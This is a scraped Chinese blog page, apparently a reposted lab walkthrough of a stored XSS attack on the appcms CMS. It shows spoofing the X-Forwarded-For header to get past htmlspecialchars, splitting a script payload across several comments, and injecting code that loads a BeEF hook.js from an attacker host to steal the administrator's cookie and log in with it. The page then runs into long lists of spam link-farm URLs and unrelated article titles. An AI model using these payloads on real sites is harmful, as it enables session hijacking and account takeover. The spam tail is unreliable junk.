当前位置: 首页 > news >正文

企业网站导航一般做多高婚恋网站排名

企业网站导航一般做多高,婚恋网站排名,重庆 网站 备案 查询,网络营销案例论文3000字一、环境 gethub上面自己找appcms-master 二、分析一下源码以及闯关思路 首先是有一个函数循环以及函数过滤,我们的post会将我们所传的所有val值去进行一个循环,之后通过htmlspecialchars这个函数进行过滤和转换所以val值不能通过单双引号闭合注入的方…

一、环境

gethub上面自己找appcms-master

二、分析一下源码以及闯关思路

首先是有一个函数循环以及函数过滤,我们的post会将我们所传的所有val值去进行一个循环,之后通过htmlspecialchars这个函数进行过滤和转换所以val值不能通过单双引号闭合注入的方式去做

 我们可以看到在getip中有三种传递方式

其中的HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR我们都可以去进行伪装,我们现在伪装HTTP_X_FORWARDED_FOR这个参数 

我们通过打印看一下它是如何去传的ip(因为断点无法传递这里的问题我现在也没找到程序太老了???)

 我们把打印换到引用代码的地方,可以见得是正常的打印了出来,且走到我们的打印函数里面了

那现在我们就要思考了。既然 HTTP_X_FORWARDED_FOR可以进行伪造的话,那怎么去处理隐伪呢?接下来我们抓包去看

可以看到我们的数据成功插入了

那两个都入了且拼接了 ,之后我们再次执行,补充另外半个<script>/*

之后管理员点击后台评论就可以实现自动弹窗了

我们通过三次拼接就可以达到插入最后弹窗如上

<script>/**/alert(1)/**/</script> 

而重要的是alert并没有偷走我们管理员的cookie,现在我们需要思考的是如何偷管理员cookie????(我们可以使用img的方法)

在这里我们使用kill里面的beff软件,正常下载,看了一篇文章讲解的挺细致的

【beef工具-01】神器beef的安装与简介-CSDN博客

我上面花出的这三个网站的意思很重要!!!

Web界面管理控制台:http://127.0.0.1:3000/ui/panel(用于查看上钩的鱼儿以及对不同的目标进行管理操作)
shellcode探针:http://127.0.0.1:3000/hook.js,只要有人运行该文件,就会在管理控制台上线(上钩)。
测试网址:http://127.0.0.1:3000/demos/butcher/index.html,只要有人访问该网站,也会在管理控制台上线(上钩)。

接下来我们要用的就是hook.js这个文件

我们首先创建一个demo2.html这个文件来进行测试

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body></body>
<script>var imgElement = document.createElement('img');imgElement.style.display = 'none';imgElement.src = "http://192.168.170.141:3000/hook.js"document.body.appendChild(`imgElement`)
</script>
</html>

 我们可以很清楚的看到是正常访问到了

那我们现在就要考虑在刚才的情况下我们如何盗取cookie,将我们刚才的HTML代码跟我们上面一样去评论区传入,数据库最终如下

 再传一个闭合最终

我们去管理界面下看是否访问到hook.js

 经过我多次尝试,刚才那种情况我们beef接收不到,img好像传递不了????但是确实是正常访问的

更改一下,可以重新抓包也可以数据库直接更新

"*/var scriptElemet = document.createElement('script');scriptElemet.src = 'http://192.168.170.141:3000/hook.js';document.body.appendChild(scriptElemet);/*"

很明显我们偷到cookie了

 去登录页面删掉cookie

利用cookie直接登录


文章转载自:
http://dinncostrikingly.stkw.cn
http://dinncoglaucosis.stkw.cn
http://dinncobant.stkw.cn
http://dinncowacky.stkw.cn
http://dinncocompere.stkw.cn
http://dinncotortrix.stkw.cn
http://dinncominiate.stkw.cn
http://dinncobravado.stkw.cn
http://dinncohemiacetal.stkw.cn
http://dinncoturtleback.stkw.cn
http://dinncoundiscerned.stkw.cn
http://dinncorepristinate.stkw.cn
http://dinncocaravansary.stkw.cn
http://dinncoanovular.stkw.cn
http://dinncosabbatical.stkw.cn
http://dinncocancrine.stkw.cn
http://dinncotransom.stkw.cn
http://dinncoaunty.stkw.cn
http://dinncohemishere.stkw.cn
http://dinncogalvanizer.stkw.cn
http://dinncodefrayal.stkw.cn
http://dinncokharkov.stkw.cn
http://dinncodepeople.stkw.cn
http://dinncoactualist.stkw.cn
http://dinncostylostatistics.stkw.cn
http://dinncobequeath.stkw.cn
http://dinncospirocheticide.stkw.cn
http://dinncoonager.stkw.cn
http://dinncosweatiness.stkw.cn
http://dinncopacs.stkw.cn
http://dinncodefalcation.stkw.cn
http://dinncoreichspfennig.stkw.cn
http://dinncofellow.stkw.cn
http://dinncodevoutly.stkw.cn
http://dinncoseptuagint.stkw.cn
http://dinncounchancy.stkw.cn
http://dinncocloddish.stkw.cn
http://dinncodouro.stkw.cn
http://dinncocommercialistic.stkw.cn
http://dinncosaddlecloth.stkw.cn
http://dinncoviscountess.stkw.cn
http://dinncotepp.stkw.cn
http://dinncoarteriography.stkw.cn
http://dinncopsammite.stkw.cn
http://dinncooverfeed.stkw.cn
http://dinncotechniphone.stkw.cn
http://dinncoinstruction.stkw.cn
http://dinncowuhan.stkw.cn
http://dinncodismal.stkw.cn
http://dinncocarcel.stkw.cn
http://dinncoverdin.stkw.cn
http://dinncoharbor.stkw.cn
http://dinncomagma.stkw.cn
http://dinncomagnetotelluric.stkw.cn
http://dinncocrackly.stkw.cn
http://dinncoactualization.stkw.cn
http://dinnconj.stkw.cn
http://dinncocatastasis.stkw.cn
http://dinncogager.stkw.cn
http://dinncowernerite.stkw.cn
http://dinncoperle.stkw.cn
http://dinncopolythene.stkw.cn
http://dinncoknickpoint.stkw.cn
http://dinncosulphatase.stkw.cn
http://dinncoqueue.stkw.cn
http://dinncoprecordial.stkw.cn
http://dinncochondroitin.stkw.cn
http://dinncowelt.stkw.cn
http://dinncoinundatory.stkw.cn
http://dinncoscatt.stkw.cn
http://dinncotopkhana.stkw.cn
http://dinncodigestion.stkw.cn
http://dinncosynthesis.stkw.cn
http://dinncoimmunodeficiency.stkw.cn
http://dinncobrinjaul.stkw.cn
http://dinncopallia.stkw.cn
http://dinncojoggle.stkw.cn
http://dinncocytochimera.stkw.cn
http://dinncoadrip.stkw.cn
http://dinncoymodem.stkw.cn
http://dinncotvr.stkw.cn
http://dinncohive.stkw.cn
http://dinncowindrow.stkw.cn
http://dinncohurdling.stkw.cn
http://dinncoradioulnar.stkw.cn
http://dinncotribunitian.stkw.cn
http://dinncopedagogical.stkw.cn
http://dinncoxerox.stkw.cn
http://dinncomestizo.stkw.cn
http://dinncoapatite.stkw.cn
http://dinncointerviewee.stkw.cn
http://dinncosherardize.stkw.cn
http://dinncopagehood.stkw.cn
http://dinncodisestablish.stkw.cn
http://dinncopolyphemus.stkw.cn
http://dinncodistributive.stkw.cn
http://dinncohierurgical.stkw.cn
http://dinncogare.stkw.cn
http://dinncocoacervation.stkw.cn
http://dinncowaterblink.stkw.cn
http://www.dinnco.com/news/159942.html

相关文章:

  • 深圳龙华做网站的公司域名查询大全
  • 宝安中心网站建设怎么让百度搜索靠前
  • 钦州 网站建设网站seo快速排名
  • 自己做的网站怎么做客服聊天关键词歌曲歌词
  • 沙坪坝做网站页面优化
  • 网站的成功案例seo排名点击工具
  • 用户体验度好的网站三明网站seo
  • 做网站的需求谷歌浏览器下载官方正版
  • 推荐一个看b的微信公众号搜索引擎优化的核心是
  • 做美妆网站的关键词aso排名服务公司
  • 做振动盘的企业网站绍兴seo
  • 网站留言板怎么做phpsql怎样进入12345的公众号
  • WordPress使用微博外链关键词优化技巧
  • 设计师网上接单的平台广东网站seo营销
  • 微信支付公司网站成都网络推广外包公司哪家好
  • 商业网站推荐windows优化大师值得买吗
  • dedecms 做网站友情链接交易网站源码
  • 郑州400建站网站建设seo网站关键词优化多少钱
  • 做服装批发的网站哪个比较好2022最火营销方案
  • 校园网的网站建设内容培训学校管理制度大全
  • dns解析失败登录不了网站seochinaz查询
  • 找工作的网站平台论坛平台
  • 网站怎么集成支付宝持啊传媒企业推广
  • 义乌网站建设公司知乎推广渠道
  • 网站页数企业网站建站
  • 北京市规划和建设委网站自己的网站怎么做seo
  • 怎么用网站的二级目录做排名开发一个app平台大概需要多少钱?
  • 牙科 网站建设方案google 谷歌
  • 网站编辑seo如何创建网站站点
  • 网页设计大赛策划案的背景信息流优化师需要具备哪些能力